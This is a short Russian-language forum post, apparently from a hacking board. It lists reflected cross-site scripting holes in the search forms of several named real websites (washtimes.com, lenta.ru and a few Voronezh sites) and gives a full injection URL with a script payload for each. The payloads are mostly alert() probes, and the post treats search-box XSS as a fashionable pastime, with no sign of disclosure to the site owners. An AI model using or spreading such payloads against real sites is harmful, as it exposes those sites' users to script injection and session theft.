хм... такой крупный сайт, а XSS ... не хорошо (( www.washtimes.com Например: Справа форма поиска "Quick Search" - вводи чё хошь... http://www.washtimes.com/archive/index.php?Action=Go&Keywords='%3E%3Cscript%3Ealert()%3C/script%3E кстати, вот ещё на лента.ру : http://lenta.ru/Search?Search="><script>alert()</script>&x=7&y=7 и вот: http://www.voronezh.ru/cgi-bin/yp.pl?sample="+<script>alert('XSS_BY_YA')</script>+"&x=25&y=3 и вот: http://hosting.vrn.ru/cgi-bin/searc...S_BY_YA')</script>+"&mf=10&nodate=1&x=30&y=12 и вот: http://www.084.vrn.ru/cgi-bin/searc...SS_BY_YA')</script>+"&t=P&A=&T=&il=0&x=25&y=8 А вообще XSS в поисковике... - это щас модно)))
